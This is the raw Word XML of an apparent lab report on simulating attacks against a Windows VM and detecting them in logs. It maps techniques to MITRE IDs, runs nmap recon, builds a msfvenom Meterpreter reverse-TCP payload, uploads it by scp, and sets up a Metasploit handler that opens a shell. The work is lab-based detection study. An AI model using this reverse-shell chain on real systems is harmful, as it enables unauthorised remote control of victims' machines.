                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Obfuscated PowerShell commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2362" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EFD0227">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>T1140</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="62A1A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EDF89B1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24E6C1A3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SMB/Local Copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06BD5045">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Copying test file (fake_exfil.txt) to monitored folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2362" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55C3067F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CDE12B6">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc4541"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Table </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1</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Tools and phases used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA8088A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc11981"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1CFAC7A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Run nmap scans for recon phase and monitor logs in windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3C465">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>The log script scans for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and triggers log (see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l "_APPENDIX A" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74F838">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ping -c 4 192.168.1.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4670B">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nmap -sn 192.168.1.53 (windows vm )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B8DABF">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nmap -sS -sV -p 1-1000 192.168.1.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2221C05D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3882390" cy="3121025"/>
            <wp:effectExtent l="0" t="0" r="3810" b="317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3882390" cy="3121025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="491BB730">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc29643"/>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2</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nmap results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EC1E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1A3990">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc30591"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7081F4D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Generate a Windows payload with msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA01B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.43 LPORT=4444 -f exe &gt; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3DAF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Upload it over SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252A801">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">scp payload.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:Windows@192.168.1.53:C:/Users/Windows/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows@192.168.1.53:C:/Users/Windows/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7444D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5731510" cy="2515870"/>
            <wp:effectExtent l="0" t="0" r="13970" b="13970"/>
            <wp:docPr id="18" name="Picture 18" descr="send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nd payload"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2515870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD6FD4">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc11724"/>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3 Shows payload being sent to windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E794402">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>On Kali, set up handler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72921BC4">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handlerset </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC4E5B">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">PAYLOAD windows/meterpreter/reverse_tcpset </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61808600">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LHOST 192.168.1.43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8088A">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD8B0F">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D9E52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Now on Windows, execute payload.exe , </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Meterpreter shell is opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201BE5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5729605" cy="1062990"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="20" name="Picture 20" descr="run payload to start meterpreter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un payload to start meterpreter shell"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5729605" cy="1062990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B13B706">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc6013"/>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4</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payload successfully sent on windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C68D60">
      <w:pPr>
